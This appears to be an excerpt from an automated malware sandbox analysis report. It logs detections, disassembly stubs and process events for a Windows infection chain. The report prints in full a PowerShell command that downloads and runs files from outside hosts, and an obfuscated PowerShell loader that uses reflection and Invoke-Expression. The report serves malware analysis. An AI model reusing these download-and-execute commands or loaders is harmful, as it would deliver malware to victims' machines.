                        Source: Yara matchFile source: 00000009.00000002.2111304892.000000000527A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1889715255.000001E368665000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        .NET source code contains potential unpacker
                        Source: 18.3.svchost.exe.2435dcbc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 18.3.svchost.exe.2435dcbc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 18.3.svchost.exe.2435dcbc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 18.3.svchost.exe.2435dcbc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Shylocked)$gloBAl:kantsTenenS = [sYStEM.TexT.eNCOdiNG]::aScII.getstRing($DdnINgEn)$glOBAL:tIlSKAdEKOmNe=$KaNTSTenens.SUBstrinG($djvElskaBeRS,$unprepArEDNesS)<#Stradivariuser Vandretu
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Disorder $ukammeratligtrob62 $Skrebrndere), (sllerternes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Simultantolkendes = [AppDomain]::CurrentDomain.Get
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Foolproof)), $Splintfries241).DefineDynamicModule($Myrmecophagine, $false).DefineType($forgngere, $Dyspepsien, [System.MulticastDelega
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Shylocked)$gloBAl:kantsTenenS = [sYStEM.TexT.eNCOdiNG]::aScII.getstRing($DdnINgEn)$glOBAL:tIlSKAdEKOmNe=$KaNTSTenens.SUBstrinG($djvElskaBeRS,$unprepArEDNesS)<#Stradivariuser Vandretu
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelB
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelB
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Banky='Myohemoglobin';;$Tadpolelikemmute='Cineangiocardiography';;$Hovedkatalogernes='Tilbagekobling';;$Festsalenes='Gryde';;$Tadpolelikendustri=$host.Name;function ectethmoid($Reskompagnierne){If ($Tadpolelikendustri) {$Endogamic=2} for ($Tadpolelike=$Endogamic;;$Tadpolelike+=3){if(!$Reskompagnierne[$Tadpolelike]){$Forthcoming++;break }$Trillers+=$Reskompagnierne[$Tadpolelike];$Disrobes='Kogeplader'}$Trillers}function Allestedsnrvrende($Gentlemanise7){ .($Iserine) ($Gentlemanise7)}$hyetometric=ectethmoid 'Srn peoft H.trw';$hyetometric+=ectethmoid 'A.E bSnc PLNeI je .nBuT';$Slavepen=ectethmoid 'EnM Pocuz,fi Pl .lInaFo/';$Germanizer162=ectethmoid 'JuTTrlYas.e1I 2';$kreditstramningen='S [StN rE tSo.CosO.E.eR.ovStiAdC tEBePPaO ki nCatB mTeaStnOvaA.greEkrR ] ,:Ne:s,SBoEsuCNoUHyr,oi TTBuYElp ARanOSetDooc.C OSpLSu=An$F.GCaE BrE.mBoaAdnBri AzF E nRJe1 K6 S2';$Slavepen+=ectethmoid ' C5 ,. M0 i Tr( jW iFrnSydFao uwBrser UnNViTSa R 1Ka0B,.Li0Ph; o .dWs i in B6 v4O ;E, HexTr6Fl4Ca;Ri rrR v n:V,1Re3B.1 x.af0 .)Sp GRrel cjekSto r/Ra2S 0Ap1P 0.a0Sk1Po0Ji1 a FaFSui OrFueR,fLro.axMu/Az1 m3In1Ci. o0';$campi=ectethmoid 'CuUDuS KE BROp- aDegaseR N T';$agreed=ectethmoid 'S.hDit ht ,pLes :D./ l/ ,wUnwh w A.Arf otFosCeeUmn ngO i CnBre AeS rHusAs.UncYdo em e/ iCotP /RoE smSonFaeDyrFlnAdeSpsPr1Me2Pa3Gr..amPrdUnp >SyhSatS tnopSls,u:tr/Ma/ UwMiwB wRa. rpTeuStn BeLue .tFa. uaFueaa/PoiFotMe/ EOtmClnBeeArrTinTieKls 1P.2 3Dr.B.m d p';$Untemporally=ectethmoid 'Un>';$Iserine=ectethmoid ' I,te X';$Wordpro='Ankomststationens';$Husven='\Exultet.Bid';Allestedsnrvrende (ectethmoid 'Ud$ iGkrLAnoUnBBiaNelBo:Omg cnPea.mv in FI nn.ngky=Hj$.eevaN pVLo:phaRuPAfpUdDFoaalt,aaV + $Guh Su MsUnvLoe.uN');Allestedsnrvrende (ectethmoid 'In$CoGPalB OVabGuaFolUn:BasMev niv.NKae s i=Km$KaaRegm,R PE BE .d V.K SApP SlSuiDeTMe(To$ GURenNetToe vmShPFoo.rRBaaVaLA LBayW,)');Allestedsnrvrende (ectethmoid $kreditstramningen);$agreed=$Svines[0];$Montmartre=(ectethmoid 'U $P GS LTao tb Pa Il,o: oG Bo lnPidSuOAnl tILnE SRVa=R,NBueB W.n-SaOH B nJXee.eC tBu TusUnyFlsN TD,E ,mIn.De$BuHM Y ,eSiT osyM ,eCaT R,diCoC');Allestedsnrvrende ($Montmartre);Allestedsnrvrende (ectethmoid 'Ka$I GY obenPed.ao jlCai,teH.rS . oHS eH aHad AeH r sOv[ n$A cR a ImR p TiLe]K =Ba$D,SMilGla gv ae pafeRen');$Linievogternes=ectethmoid 'Po$ChGS oClnPjdS.oMolLaiVieDar ..,qDSyoVew nMol ,oO,a KdFlFEkiPelP.eBe( $ PaSng.erPoeGre .dk ,Tr$QuBPreK gK,yRan.ad eFalSmsToe.esBeltei Fn njAfeLerStn eLu1 r0tu9Aa)';$Begyndelseslinjerne109=$Gnavning;Allestedsnrvrende (ectethmoid ' f$G gB L .oYab.iaHeLA :VuC DI,oV oI ulovbApeHeS oKM YFot tSyE Sl osfnEIns p= H( Pt BE.es dtEu-ScpD,ajuTPrH.i Yi$Idb PeSoGOpy n eDMeeBelK sMuEW,S yLHviHenBojBaE RUdNSnE A1,u0sk9U.)');while (!$Civilbeskyttelses) {Allestedsnrvrende (ectethmoid 'In$DigLylS o Ab HaK,lUd: rPInu hr EiFrfAci CeE dPu= $ oUagnF d eH rSkb neIltDraBelBJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7C00AD pushad ; iretd 6_2_00007FFD9B7C00C1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02826290 pushad ; ret 9_2_028262A9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0282BF45 pushfd ; retf 9_2_0282C0D9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F4920 push 0000002Eh; iretd 17_3_032F4922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F5F0C push es; iretd 17_3_032F5F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F1179 push FFFFFF82h; iretd 17_3_032F117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F278B push ebx; ret 17_3_032F28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F5FEE push FFFFFFD2h; retf 17_3_032F6011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F0FEA push eax; ret 17_3_032F0FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F5606 pushad ; retf 17_3_032F5619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F6012 push 00000038h; iretd 17_3_032F601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F225D push eax; ret 17_3_032F225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F58BC pushad ; ret 17_3_032F58C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F588E push eax; iretd 17_3_032F589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F28ED push ebx; ret 17_3_032F28E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_3_032F18C0 push ebp; retf 17_3_032F18C1
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
